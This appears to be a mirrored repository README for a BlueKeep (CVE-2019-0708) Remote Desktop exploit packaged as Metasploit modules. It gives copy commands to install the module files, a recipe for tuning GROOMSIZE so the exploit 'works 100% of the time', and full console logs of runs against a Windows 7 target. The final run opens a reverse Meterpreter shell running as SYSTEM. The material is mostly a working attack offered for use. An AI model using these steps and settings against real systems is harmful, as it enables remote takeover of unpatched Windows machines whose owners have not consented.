# bluekeep-exploit **Repository Path**: yangb92/bluekeep-exploit ## Basic Information - **Project Name**: bluekeep-exploit - **Description**: No description available - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2020-03-14 - **Last Updated**: 2020-12-19 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # bluekeep-exploit Bluekeep(CVE 2019-0708) exploit released https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/ How To use: Simply make folder named rdp (for convenience) in /usr/share/metasploit-framework/modules/exploits/windows/ paste this exploit file(cve_2019_0708_bluekeep_rce.rb) in the folder(rdp) and use ur metasploit skills Also replace the files in following folders:- rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/ cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/ cp ./rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/ cp ./cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/ cp ./cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb like: use exploit/windows/rdp/cve_2019_0708_bluekeep_rce and then ur general concepts of setting rhosts,lhost,payload etc Thanks to the Genius Group of People for their wonderful work Note:[I am not the developer of this exploit but only an ethusiast of learning exploits] HOW TO MAKE THE EXPLOIT WORK 100% OF THE TIME: ############################ You have to set the GROOMSIZE as show below with different combinations and error Also my VMWARE(15) windows hardware was 2GB RAM and 1 Core processor Conclusion setting GROOMSIZE to 50 worked as good as gold ############################ msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 100 GROOMSIZE => 100 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run [*] Started reverse TCP handler on 192.168.43.84:4444 [*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.43.137:3389 - The target is vulnerable. [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa801f000000, Channel count 1. [*] 192.168.43.137:3389 - Surfing channels ... [*] 192.168.43.137:3389 - Lobbing eggs ... [*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ... [*] Exploit completed, but no session was created. msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 150 GROOMSIZE => 150 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run [*] Started reverse TCP handler on 192.168.43.84:4444 [*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.43.137:3389 - The target is vulnerable. [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1. [*] 192.168.43.137:3389 - Surfing channels ... [*] 192.168.43.137:3389 - Lobbing eggs ... [-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploit completed, but no session was created. msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 50 GROOMSIZE => 50 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run [*] Started reverse TCP handler on 192.168.43.84:4444 [*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.43.137:3389 - The target is vulnerable. [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1. [*] 192.168.43.137:3389 - Surfing channels ... [*] 192.168.43.137:3389 - Lobbing eggs ... [*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ... [*] Sending stage (206403 bytes) to 192.168.43.137 [*] Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >